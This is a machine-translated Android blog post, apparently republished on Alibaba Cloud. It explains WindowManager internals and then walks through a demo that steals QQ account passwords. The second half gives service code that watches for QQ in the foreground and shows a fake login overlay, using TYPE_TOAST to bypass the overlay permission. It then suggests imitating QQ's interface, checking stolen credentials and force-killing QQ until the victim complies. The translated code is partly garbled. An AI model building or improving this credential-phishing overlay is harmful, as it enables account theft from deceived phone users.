Android WindowManager parsing and cheating QQ password case analysis

Last Update:2016-01-10 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Recently saw a person on the internet a loophole in the cloud, the application can open a background service, detection of the current top application, if it is QQ or related applications, pop up a custom window to trick the user into the account password, very interested in, summarize the relevant knowledge wrote a demo, The interface is as follows (the interface is rough, no one should be fooled, the meaning is on the line ha =, =): 　　　　　　　　　　　　 　　　　　　　　　　　　 Demo Address: Https://github.com/zhaozepeng/GrabQQPWD 　　　　　　　　　　　　Window&&windowmanager IntroductionBefore analyzing the demo, we must first summarize the relevant Knowledge. First look at the Window class, window is an abstract class, located in the code tree Frameworks\u0008asecorejavaandroidviewwindowjava.java file. Together with a note, this file totals more than 1000 lines, outlining the basic properties and basic features of the Android WINDOW. The only implementation of this abstract class is phonewindow, the instantiation of Phonewindow needs a window, only through the WindowManager can be done, the specific implementation of the window class is located in windowmanagerservice, The interaction between WindowManager and Windowmanagerservice is an IPC process. All views in Android are rendered through window, whether Activity,dialog or toast, and their views are actually attached to the window, so window is actually the direct manager of the view, The Click event is also passed to view by WINDOW. The WindowManager.LayoutParams.type parameter represents the type of window, with a total of three types, namely the application window, the child window, and the system window. The application window corresponds to an activity, such as dialog, such as Sub-window can not exist alone, he needs to be attached to the application window, the System window does not need, such as toast, can be directly displayed. Each window has a corresponding z-orderd, the large window will be covered in the hierarchy of small window, the application window is 1~99, the range of the child window is 1000~1999, the range of the system window is 2000~ 2999, these levels are related to the relevant Type,type Value: website links and Chinese materials. The WindowManager.LayoutParams.flags parameter represents the Window's property, which defaults to the relevant value of None,flags: the official link, as well as other layoutparams variable names and values can be referenced Windowmanager.layoutpar AMS (TOP) and Windowmanager.layoutparams (bottom) two translations blog, very detailed. A detailed analysis of the Windowmanager,windowmanager is mainly used to manage some of the Window's status, properties, view additions, deletions, updates, window order, message collection and Processing. An instance of WindowManager can be obtained through code Context.getsystemservice (context.window_service). The functionality provided by WindowManager is simple, there are only three methods commonly used, namely adding view, updating view and deleting view, these three methods are defined in viewmanager, and WindowManager inherit viewmanager, <ul> <ul> <li>AddView ();</li> <li>Updateviewlayout ();</li> <li>Removeview ();</li> </ul> </ul>These functions are used to modify the window, its true implementation is the Windowmanagerimpl class, the Windowmanagerimpl class does not directly implement the three operations of window, but all to the Windowmanagerglobal to deal with, Windowmanagerglobal provides its own instance in the form of a factory, with the following code in Windowmanagerglobal:<code><code>private final WindowManagerGlobal mGlobal = WindowManagerGlobal.getinstance()</code></code>。 Windowmanagerimpl This mode of operation is a typical bridging mode (not the adorner mode: the difference is here), all the operations are delegated to Windowmanagerglobal to Achieve. View is how views are rendered in android, but view cannot exist alone, he must attach to the abstract concept of window, each window corresponds to a view and a viewrootimpl, window and view are connected through viewrootimpl, so there is a window where there is a view, such as a common activity,dialog,toast. For each activity there is only one decorview that is Viewroot,window is obtained by the following method 　　 <code><code>Window mWindow = PolicyManager.makeNewWindow(this);</code></code> After the window is created, the activity sets a callback for the window, which is recalled to the activity when the window receives an external state change. The Setcontentview () function is called in the activity, which is done by calling Window.setcontentview (), and the concrete implementation of window is phonewindow, So the final concrete operation is in phonewindow, the first step of Phonewindow's Setcontentview method is to detect if the Decorview is present, and if it does not exist, The Generatedecor function is called to create a Decorview directly, and the second step is to add the activity view to the mcontentparent of Decorview The third step is to call the Oncontentchanged method in the activity to notify the activity that the view has Changed. After these steps have been completed, Decorview has not been formally added to the window by WindowManager and finally called the Makevisible method in the Activity's Onresume method in order to actually complete the addition and the actual process, The activity view is visible to the User. The creation process of the dialog window is similar to the activity, The first step is to use the Policymanager.makenewwindow method to create a window, but here the context must be the activity context, and the second step is to set the dialog layout view through the Setcontentview function; The third step calls the show method, which is displayed by adding Decorview to the window via Windowmanager. Toast and dialog are different, it is slightly more complicated, first toast is also based on window, but because the toast has a function of timing cancellation, so the system uses the Handler. There are two types of IPC processes inside the toast, the first being the toast Access notificationmanagerservice, and the TN interface in the Notificationmanagerservice callback Toast. In the toast class, the most important show method for displaying the toast is called Service.enqueuetoast (pkg, tn, mduration), which means that the system maintains a toast queue for us, This is why two toasts are not displayed at the same time, and the method will queue a toast to show when the system maintains the DISPLAY.<pre class="prettyprint"><pre class="prettyprint"><code class="hljs cs">private Static Inotificationmanager sservice; static private Inotificationmanager getservice () {if (sService ! = null ) {return sservice; } sservice = INotificationManager.Stub.asInterface (servicemanager.getservice ( " Notification ")); return sservice;} </code> </pre></pre>The service Sservice is the service that the system uses to maintain the Toast. finally, the NMS invokes a static private class tn inside the toast class through the ipc, which is the main implementation of the toast, which completes the creation, display, and hiding of the toast View. Online Introduction WindowManager Blog A lot, are written very well, to specific understanding can be combined to see the source: Http://blog.csdn.net/chenyafei617/article/details/6577940) Http://www.tuicool.com/articles/fqiyeqM http://blog.csdn.net/xieqibao/article/details/6567814 Http://www.cnblogs.com/xiaoQLu/archive/2013/05/30/3108855.html The relevant information is too much, interested can look at the source Code. 　　Cheat QQ Password InstanceWith the foundation above, This example is actually very simple. The first step is to write a service and pop a custom window on the Service:<pre class="prettyprint"><code class=" hljs avrasm">WindowManager = (windowmanager) Getsystemservice (Context. WINDOW_service);WindowManager. Layoutparamsparams = new WindowManager. Layoutparams();Params. Width= WindowManager. Layoutparams. MATCH_parent;Params. Height= WindowManager. Layoutparams. MATCH_parent;Params. Flags= WindowManager. Layoutparams. FLAG_not_touch_modal;Params. Type= WindowManager. Layoutparams. TYPE_toast;Params. Format= PixelFormat. TRANSPARENT;Params. Gravity= Gravity. CENTER;Params. Softinputmode= WindowManager. Layoutparams. SOFT_input_adjust_pan;Layoutinflater Inflater = Layoutinflater. from(this);v = (relativelayoutwithkeydetect) Inflater. Inflate(R. Layout. Window, Null);V. Setcallback(new Relativelayoutwithkeydetect. Ikeycodebackcallback() {@Override public void Backcallback () {if (v!=null && V. Isattachedtowindow()) L. E("remove view");WindowManager. Removeviewimmediate(v);}});Btn_sure = (Button) V. Findviewbyid(R. ID. BTN_sure);Btn_cancel = (Button) V. Findviewbyid(R. ID. BTN_cancel);Et_account = (EditText) V. Findviewbyid(R. ID. et_account);Et_pwd = (EditText) V. Findviewbyid(R. ID. et_pwd);Cb_showpwd = (CheckBox) V. Findviewbyid(R. ID. CB_showpwd);Cb_showpwd. Setoncheckedchangelistener(new Compoundbutton. Oncheckedchangelistener() {@Override public void OnCheckedChanged (compoundbutton buttonview, boolean isChecked) {if (isChecked) { Et_pwd. Settransformationmethod(hidereturnstransformationmethod. getinstance());} else {et_pwd. Settransformationmethod(passwordtransformationmethod. getinstance());} et_pwd. SetSelection(textutils. IsEmpty(et_pwd. GetText()) ?0: Et_pwd. GetText(). Length());}});useless//v. Setonkeylistener(new View. Onkeylistener() {//@Override//public boolean onKey (View v, int keycode, keyevent Event) {//Log. E("zhao", keycode+"");if (keycode = = KeyEvent. KeyCode_back) {//windowmanager. Removeviewimmediate(v);return True;}//return false;// }// });Click outside to disappear V. Setontouchlistener(new View. Ontouchlistener() {@Override Public boolean onTouch (view view, motionevent event) {Rect temp = new Rect ();View. Getglobalvisiblerect(temp);L. E("remove view");If (temp. Contains((int) (event. GetX()), (int) (event. GetY())) {windowmanager. Removeviewimmediate(v);return True;} return False;}});Btn_sure. Setonclicklistener(this);Btn_cancel. Setonclicklistener(this);L. E("add view");WindowManager. AddView(v, Params);</code></pre>Here are a few things to explain, the first is the type to use Type_toast instead of Type_system_error can bypass the permission, this is in the know on the see someone said a loophole, haha; the second one is because there is edittext, So the softinputmode need to be set to soft_input_adjust_pan, otherwise the soft keyboard will cover the window, the third is the return key to listen, Setonkeylistener is not good, finally, only the Dispatchkeyevent function of the view class can be replicated to implement the key monitoring, and the fourth is to click on the external disappear operation, see the code will understand. Implementation of the Popup pop-up, then set up a real-time listening, open a thread, every few seconds to listen to the user is operating the application is qq, this is much simpler, using Activitymanager can be:<pre class="prettyprint"><code class=" hljs lasso">New Thread(NewRunnable () {@Override public voidRun () { while(isrunning) {L.E"running"); try {Thread.Sleep the); } catch (interruptedexception E) {e.Printstacktrace (); } Activitymanager Activitymanager=(activitymanager) Getsystemservice (Context.activity_service);List<Activitymanager.Runningappprocessinfo> List =Activitymanager.Getrunningappprocesses ();if(List.Get0).ProcessName.equals("com.tencent.mobileqq")) {myhandler.Sendemptymessage (1); } } }}).Start ();</code></pre>This effect is almost the same, and finally start the service in the activity, of course, there is a lot of room for improvement: 1. Modify the UI to make it more similar to the QQ Style. 2. After the user entered the account and password, you can addview a loadingdialog, and then call the relevant interface to verify the correctness of the user name and password, the user is not correctly prompted to Re-enter. 3. If the user does not enter the account and password, call the Killbackgrondprocess function directly (need permission), hard to turn off qq, until the user input account and Password. Of course, This is only learning knowledge, everyone happy Ah ￣?￣, finally incidentally spit groove, these days received Ali's interview phone, call me to interview, but to interview time also did not give reply, finally did not follow, prepare and look forward to a few days, make the mood is very poor, a word, you abuse me times, I treat you like First love ~. Android WindowManager parsing and cheating QQ password case analysis

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Android WindowManager parsing and cheating QQ password case analysis

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support